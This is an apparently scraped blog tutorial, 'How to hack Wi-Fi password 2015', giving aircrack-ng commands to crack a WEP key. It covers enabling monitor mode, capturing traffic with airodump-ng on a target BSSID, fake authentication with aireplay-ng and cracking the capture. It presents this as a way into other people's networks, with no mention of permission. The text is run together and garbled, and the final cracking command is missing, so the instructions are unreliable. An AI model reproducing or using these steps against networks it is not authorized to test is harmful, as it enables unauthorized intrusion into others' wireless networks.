HOW TO HACK WI-FI PASSWORD 2015 [WORKING]

Follow Simple steps to do it
Here is what you would require to crack a WEP Key:

1. Backtrack or any other Linux distro with aircrack-
ng installed.

2. A Wi-Fi adapter capable of injecting packets,For
this tutorial I will useAlfa AWUS036H which is a very
popular card and it performs well with Backtrack.
You can find compatible Wi-Fi card lists here - Here

Open a brand newconsoleandsort within the
following commands :ifconfig wlan0 up·
Where wlan0 is the name of the wireless card,
it canbe different.· To see all wireless cards
connected to your system simply type in "iwconfig".
·Step 1:Turn on Monitor Mode!!- To begin, you'll
need to first put your wireless adapter into monitor
mode,- Monitor mode is the mode where by your
card can listen to every packet in the air,- You can
put your card into monitor mode by typingin the
following commands:airmon-ngairmon-ng start
wlan0·

Step 2:airodump-ng mon0·

Step 3:airodump-ng -w twan -c 11 -
bssid·C8:3A:35:2F:E7:30 mon0·

Step 4: "aireplay-ng -1 0 -a·C8:3A:35:2F:E7:30
mon0"· As a last step we crack WEP key by using
captured packets andaircrack-ngcommand.· All
captured packets are now stored intwan=02.capfile.

NOTE: Do not stop capturing process as you do not know if current amount of captured packed is
satisfactory to crack WEP key.

Post a Comment

Post Your Comments

Previous Post Next Post

Contact Form